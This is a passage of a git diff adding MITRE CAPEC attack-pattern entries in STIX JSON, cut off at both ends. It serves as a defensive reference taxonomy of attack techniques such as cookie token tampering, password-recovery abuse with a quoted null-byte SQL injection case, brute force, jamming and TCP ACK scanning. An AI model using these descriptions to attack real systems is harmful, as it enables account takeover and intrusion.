"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "DEPRECATED: Dump Password Hashes", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/566.html", + "external_id": "CAPEC-566" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4f6e2713-e1e5-472a-a3fb-a561029a7c70.json b/capec/attack-pattern/attack-pattern--4f6e2713-e1e5-472a-a3fb-a561029a7c70.json new file mode 100644 index 0000000000..3ace4b56e1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4f6e2713-e1e5-472a-a3fb-a561029a7c70.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--8321477c-fb85-4381-9e1a-5b8735d1ab0a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4f6e2713-e1e5-472a-a3fb-a561029a7c70", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: XML Parser Attack", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads and CAPEC-231: XML Oversized Payloads. Please refer to these CAPECs going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/99.html", + "external_id": "CAPEC-99" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f.json b/capec/attack-pattern/attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f.json new file mode 100644 index 0000000000..c474695220 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f.json @@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--3ccc3f83-4a24-4f48-8f33-b5a6ed75dd65", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--4f95b56c-5e5d-4ae4-be95-b13a2278e06f", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Manipulating Opaque Client-based Data Tokens", + "description": "In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/39.html", + "external_id": "CAPEC-39" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html", + "external_id": "CWE-353" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html", + "external_id": "CWE-302" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html", + "external_id": "CWE-472" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html", + "external_id": "CWE-565" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html", + "external_id": "CWE-315" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html", + "external_id": "CWE-539" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html", + "external_id": "CWE-384" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/233.html", + "external_id": "CWE-233" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, he/she proceeds.", + "Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \"u\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \"u\" for \"a\" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct \"flip\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.", + "Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.", + "For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere." + ], + "x_capec_resources_required": [ + "The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data." + ], + "x_capec_skills_required": { + "High": "If the client site token is encrypted.", + "Medium": "If the client site token is obfuscated." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75.json b/capec/attack-pattern/attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75.json new file mode 100644 index 0000000000..37e046cb48 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75.json @@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--5278f241-bf34-4f6a-9f9d-8242a5fb3c2a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5000f07d-b0e2-48cc-bd4e-5149fa707e75", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Password Recovery Exploitation", + "description": "An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure. Most of them use only one security question . For instance, mother's maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother's maiden name for verification purposes. An attacker can then try to log in into one of the victim's accounts, click on \"forgot password\" and there is a good chance that the security question there will be to provide mother's maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/50.html", + "external_id": "CAPEC-50" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html", + "external_id": "CWE-522" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/640.html", + "external_id": "CWE-640" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/718.html", + "external_id": "CWE-718" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Advisory: Unauthorized password recovery in phpBannerExchange, 2006, RedTeam Pentesting GmbH", + "url": "http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt", + "external_id": "REF-429" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_example_instances": [ + "An attacker clicks on the \"forgot password\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.", + "\n phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.\n A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over his account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.\n The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:\n if(!eregi(\"^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,3})$\", $email)){\n \n A bug in the implementation of eregi() allows to pass additional character using a null byte \"\\0\". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \" ' \" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:\n $get_info=mysql_query(\"select * from banneruser whereemail='$email' \");\n \n This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.\n Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.See also: CVE-2006-3013" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system allows users to recover their passwords and gain access back into the system.", + "Password recovery mechanism has been designed or implemented insecurely.", + "Password recovery mechanism relies only on something the user knows and not something the user has.", + "No third party intervention is required to use the password recovery mechanism." + ], + "x_capec_resources_required": [ + "For a brute force attack one would need a machine with sufficient CPU, RAM and HD." + ], + "x_capec_skills_required": { + "Low": "Brute force attack", + "Medium": "Social engineering and more sophisticated technical attacks." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--500e1752-39e7-49d4-a0e3-c245e6d3ebf9.json b/capec/attack-pattern/attack-pattern--500e1752-39e7-49d4-a0e3-c245e6d3ebf9.json new file mode 100644 index 0000000000..9a9ac6485c --- /dev/null +++ b/capec/attack-pattern/attack-pattern--500e1752-39e7-49d4-a0e3-c245e6d3ebf9.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--278ab42e-647a-424c-85ce-4f60e5573e44", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--500e1752-39e7-49d4-a0e3-c245e6d3ebf9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-12T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Terrestrial Jamming", + "description": "In this attack pattern, the adversary transmits disruptive signals in the direction of the target consumer-level satellite dish (as opposed to the satellite itself). The transmission disruption occurs in a more targeted range. Portable terrestrial jammers have a range of 3-5 kilometers in urban areas and 20 kilometers in rural areas. This technique requires a terrestrial jammer that is more powerful than the frequencies sent from the satellite.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/599.html", + "external_id": "CAPEC-599" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Small Media, Satellite Jamming in Iran: A War over Airwaves, 2012--11", + "external_id": "REF-462" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Other (A successful attack will deny, degrade, or disrupt availability of satellite communications for the target by overwhelming its resources to accurately receive authorized transmissions.)" + ] + }, + "x_capec_example_instances": [ + "An attempt to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These jamming signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "\n A terrestrial satellite jammer with a signal more powerful than that of the satellite attempting to communicate with the target.\n The adversary must know the location of the target satellite dish.\n " + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--50c7380e-2a83-4980-bd5e-7242fc3adb33.json b/capec/attack-pattern/attack-pattern--50c7380e-2a83-4980-bd5e-7242fc3adb33.json new file mode 100644 index 0000000000..35913ee3eb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--50c7380e-2a83-4980-bd5e-7242fc3adb33.json @@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--c462e523-2d7d-4ae9-84b7-05a0aa5b8d97", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--50c7380e-2a83-4980-bd5e-7242fc3adb33", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Passive OS Fingerprinting", + "description": "An adversary engages in activity to detect the version or type of OS software in a an environment by passively monitoring communication between devices, nodes, or applications. Passive techniques for operating system detection send no actual probes to a target, but monitor network or client-server communication between nodes in order to identify operating systems based on observed behavior as compared to a database of known signatures or values. While passive OS fingerprinting is not usually as reliable as active methods, it is generally better able to evade detection.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/313.html", + "external_id": "CAPEC-313" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Hide Activities" + ], + "Authorization": [ + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The ability to monitor network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "Any tool capable of monitoring network communications, like a packet sniffer (e.g., Wireshark)" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5121f513-4680-469c-9359-1a21eeb3b961.json b/capec/attack-pattern/attack-pattern--5121f513-4680-469c-9359-1a21eeb3b961.json new file mode 100644 index 0000000000..88bfb3875d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5121f513-4680-469c-9359-1a21eeb3b961.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--757e3671-dd9f-4093-806a-58147e6fb9a7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5121f513-4680-469c-9359-1a21eeb3b961", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-11-09T00:00:00.000Z", + "name": "Rogue Integration Procedures", + "description": "An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/524.html", + "external_id": "CAPEC-524" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_example_instances": [ + "An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to an integration facility that prepares the system before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a.json b/capec/attack-pattern/attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a.json new file mode 100644 index 0000000000..7a986a116d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--caa3476e-1126-4e35-a0bc-1cfd7bb3df24", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5178fa3f-5602-444b-9199-3a7c34a42d9a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Brute Force", + "description": "In this attack, some asset (information, functionality, identity, etc.) is protected by a finite secret value. The attacker attempts to gain access to this asset by using trial-and-error to exhaustively explore all the possible secret values in the hope of finding the secret (or a value that is functionally equivalent) that will unlock the asset. Examples of secrets can include, but are not limited to, passwords, encryption keys, database lookup keys, and initial values to one-way functions. The key factor in this attack is the attackers' ability to explore the possible secret space rapidly. This, in turn, is a function of the size of the secret space and the computational power the attacker is able to bring to bear on the problem. If the attacker has modest resources and the secret space is large, the challenge facing the attacker is intractable. While the defender cannot control the resources available to an attacker, they can control the size of the secret space. Creating a large secret space involves selecting one's secret from as large a field of equally likely alternative secrets as possible and ensuring that an attacker is unable to reduce the size of this field using available clues or cryptanalysis. Doing this is more difficult than it sounds since elimination of patterns (which, in turn, would provide an attacker clues that would help them reduce the space of potential secrets) is difficult to do using deterministic machines, such as computers. Assuming a finite secret space, a brute force attack will eventually succeed. The defender must rely on making sure that the time and resources necessary to do so will exceed the value of the information. For example, a secret space that will likely take hundreds of years to explore is likely safe from raw-brute force attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/112.html", + "external_id": "CAPEC-112" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/330.html", + "external_id": "CWE-330" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html", + "external_id": "CWE-326" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html", + "external_id": "CWE-521" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_prerequisites": [ + "The attacker must be able to determine when they have successfully guessed the secret. As such, one-time pads are immune to this type of attack since there is no way to determine when a guess is correct." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources the attacker has at their disposal. This attack method is resource expensive: having large amounts of computational power do not guarantee timely success, but having only minimal resources makes the problem intractable against all but the weakest secret selection procedures." + ], + "x_capec_skills_required": { + "Low": "The attack simply requires basic scripting ability to automate the exploration of the search space. More sophisticated attackers may be able to use more advanced methods to reduce the search space and increase the speed with which the secret is located." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5181a9cd-e899-469e-9969-b7aef0d78db5.json b/capec/attack-pattern/attack-pattern--5181a9cd-e899-469e-9969-b7aef0d78db5.json new file mode 100644 index 0000000000..7e52e76ca5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5181a9cd-e899-469e-9969-b7aef0d78db5.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--f2dbae22-3ae9-4dbd-a055-80ce9fd332d5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5181a9cd-e899-469e-9969-b7aef0d78db5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Signature Spoofing by Mixing Signed and Unsigned Content", + "description": "An attacker exploits the underlying complexity of a data structure that allows for both signed and unsigned content, to cause unsigned data to be processed as though it were signed data.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/477.html", + "external_id": "CAPEC-477" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html", + "external_id": "CWE-319" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Signer and recipient are using complex data storage structures that allow for a mix between signed and unsigned data", + "Recipient is using signature verification software that does not maintain separation between signed and unsigned data once the signature has been verified." + ], + "x_capec_skills_required": { + "High": "Attacker must be able to create malformed data blobs and know how to insert them in a location that the recipient will visit." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--52d88856-00b1-49f3-82b6-388569b03291.json b/capec/attack-pattern/attack-pattern--52d88856-00b1-49f3-82b6-388569b03291.json new file mode 100644 index 0000000000..f4cbca4cf0 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--52d88856-00b1-49f3-82b6-388569b03291.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--dd09419a-dd20-4a47-aa9c-280be3f81a63", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--52d88856-00b1-49f3-82b6-388569b03291", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP ACK Scan", + "description": "An adversary uses TCP ACK segments to gather information about firewall or ACL configuration. The purpose of this type of scan is to discover information about filter configurations rather than port state. This type of scanning is rarely useful alone, but when combined with SYN scanning, gives a more complete picture of the type of firewall rules that are present. When a TCP ACK segment is sent to a closed port, or sent out-of-sync to a listening port, the RFC 793 expected behavior is for the device to respond with a RST. Getting RSTs back in response to a ACK scan gives the attacker useful information that can be used to infer the type of firewall present. Stateful firewalls will discard out-of-sync ACK packets, leading to no response. When this occurs the port is marked as filtered. When RSTs are received in response, the ports are marked as unfiltered, as the ACK packets solicited the expected behavior from a port. When combined with SYN techniques an attacker can gain a more complete picture of which types of packets get through to a host and thereby map out its firewall rule-set. ACK scanning, when combined with SYN scanning, also allows the adversary to analyze whether a firewall is stateful or non-stateful. If a SYN solicits a SYN/ACK or a RST and an ACK solicits a RST, the port is unfiltered by any firewall type. If a SYN solicits a SYN/ACK, but an ACK generates no response, the port is statefully filtered. When a SYN generates neither a SYN/ACK or a RST, but an ACK generates a RST, the port is statefully filtered. When neither SYN nor ACK generates any response, the port is blocked by a specific firewall rule, which can occur via any type of firewall. TCP ACK Scans are somewhat faster and more stealthy than other types of scans but often requires rather sophisticated analysis by an experienced person. A skilled adversary may use this method to map out firewall rules, but the results of ACK scanning will be less useful to a novice.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/305.html", + "external_id": "CAPEC-305" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires logical access to the target network. ACK scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges." + ], + "x_capec_resources_required": [ + "This attack can be achieved via the use of a network mapper or scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1.json b/capec/attack-pattern/attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1.json new file mode 100644 index 0000000000..4cddf12431 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1.json @@ -0,0 +1,116 @@ +{ + "type": "bundle", + "id": "bundle--7c88e9e8-56a4-4ebb-b08b-0ada8c6a1ff7", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5376ae8c-a2da-4f87-941e-ccc030c8fdb1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "String Format Overflow in syslog()", + "description": "This attack targets the format string vulnerabilities in the syslog() function. An attacker would typically inject malicious input in the format string parameter of the syslog function. This is a common problem, and many public vulnerabilities and associated exploits have been posted.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/67.html", + "external_id": "CAPEC-67" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/120.html", + "external_id": "CWE-120" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/134.html", + "external_id": "CWE-134" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + 